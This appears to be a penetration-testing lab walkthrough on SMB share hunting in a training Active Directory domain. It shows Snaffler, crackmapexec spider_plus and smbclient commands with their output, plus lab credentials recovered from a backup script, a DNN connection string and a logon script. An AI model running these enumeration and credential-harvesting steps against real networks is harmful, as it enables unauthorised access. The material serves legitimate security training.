Shares Hunting

As hporter, lets use Snaffler to see if we can get our hands on any sensitive informations. Copying it from our share to local DNN folder.

copy \\TSCLIENT\share\Snaffler.exe

Connection string: SiteSqlServer

ID=MyDNNUser;Password=MyDNNS3cureP@$$w0rD"

cdoUserName\ =\ "[email protected]"\t'EMAIL\ -\ USERNAME\ -\ IF\ AUTHENTICATION\ REQUIRED\r\nConst\ cdoPassword\ =\ "L337^p@$$w0rD"\t\t\t'

I get a few credentials, just keep notes for now. And we also see a list of shares that Snaffler browsed through.

Next, do the same share hunting using ssmalls credentials. Instead of Snaffler we use netexec

crackmapexec smb 172.16.8.3 -u ssmalls -p ezpwned -M spider_plus --share 'Department Shares'

SMB         172.16.8.3      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.8.3      445    DC01             [+] INLANEFREIGHT.LOCAL\ssmalls:ezpwned 
SPIDER_PLUS 172.16.8.3      445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 172.16.8.3      445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 172.16.8.3      445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 172.16.8.3      445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 172.16.8.3      445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 172.16.8.3      445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 172.16.8.3      445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         172.16.8.3      445    DC01             [*] Enumerated shares
SMB         172.16.8.3      445    DC01             Share           Permissions     Remark
SMB         172.16.8.3      445    DC01             -----           -----------     ------
SMB         172.16.8.3      445    DC01             ADMIN$                          Remote Admin
SMB         172.16.8.3      445    DC01             C$                              Default share
SMB         172.16.8.3      445    DC01             Department Shares READ            Share for department users
SMB         172.16.8.3      445    DC01             IPC$            READ            Remote IPC
SMB         172.16.8.3      445    DC01             NETLOGON        READ            Logon server share 
SMB         172.16.8.3      445    DC01             SYSVOL          READ            Logon server share 
SPIDER_PLUS 172.16.8.3      445    DC01             [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/172.16.8.3.json".
SPIDER_PLUS 172.16.8.3      445    DC01             [*] SMB Shares:           6 (ADMIN$, C$, Department Shares, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 172.16.8.3      445    DC01             [*] SMB Readable Shares:  4 (Department Shares, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 172.16.8.3      445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 172.16.8.3      445    DC01             [*] Total folders found:  38
SPIDER_PLUS 172.16.8.3      445    DC01             [*] Total files found:    7
SPIDER_PLUS 172.16.8.3      445    DC01             [*] File size average:    10.43 KB
SPIDER_PLUS 172.16.8.3      445    DC01             [*] File size min:        22 B
SPIDER_PLUS 172.16.8.3      445    DC01             [*] File size max:        32.15 KB

cat /tmp/nxc_hosted/nxc_spider_plus/172.16.8.3.json
{
    "Department Shares": {
        "IT/Private/Development/SQL Express Backup.ps1": {
            "atime_epoch": "2022-06-01 13:34:16",
            "ctime_epoch": "2022-06-01 13:34:16",
            "mtime_epoch": "2022-06-01 13:35:16",
            "size": "3.91 KB"
        }
    },
    "NETLOGON": {
        "adum.vbs": {
            "atime_epoch": "2022-06-01 13:34:41",
            "ctime_epoch": "2022-06-01 13:34:41",
            "mtime_epoch": "2022-06-01 13:34:39",
            "size": "32.15 KB"
        }
    },
    "SYSVOL": {
        "INLANEFREIGHT.LOCAL/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2022-06-01 13:17:55",
            "ctime_epoch": "2022-06-01 13:11:08",
            "mtime_epoch": "2022-06-01 13:17:55",
            "size": "22 B"
        },
        "INLANEFREIGHT.LOCAL/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2022-06-01 13:17:55",
            "ctime_epoch": "2022-06-01 13:11:08",
            "mtime_epoch": "2022-06-01 13:17:55",
            "size": "1.07 KB"
        },
        "INLANEFREIGHT.LOCAL/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2022-06-01 13:11:08",
            "ctime_epoch": "2022-06-01 13:11:08",
            "mtime_epoch": "2022-06-01 13:11:12",
            "size": "22 B"
        },
        "INLANEFREIGHT.LOCAL/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2022-06-01 13:11:09",
            "ctime_epoch": "2022-06-01 13:11:09",
            "mtime_epoch": "2022-06-01 13:11:12",
            "size": "3.68 KB"
        },
        "INLANEFREIGHT.LOCAL/scripts/adum.vbs": {
            "atime_epoch": "2022-06-01 13:34:41",
            "ctime_epoch": "2022-06-01 13:34:41",
            "mtime_epoch": "2022-06-01 13:34:39",
            "size": "32.15 KB"
        }
    }

Now that we have the list of shares, lets use smbclient to log in and browse them:

Department Shares

smbclient -U ssmalls '//172.16.8.3/Department Shares'

smb: \IT\Private\Development\> get "SQL Express Backup.ps1"

After opening I see that the backup is done with the credentials of backupadm user:

$mySrvConn.Login = "backupadm"
$mySrvConn.Password = "!qazXSW@"

Sysvol

smbclient -U ssmalls '//172.16.8.3/sysvol'

smb: \INLANEFREIGHT.LOCAL\scripts\> get adum.vbs

Digging through the script we find another set of credentials: account:L337^p@$$w0rD. The one we took note of earlier when we found it using Snaffler.

I couldnt see anything in Bloodhound about the user account. According to the section this might be an old disabled account, but we got credentials regardless.

So far we got the credential pairs for 2 AD users. And the backupadm user.

PreviousActive Directory NextKerberoasting

Last updated 10 months ago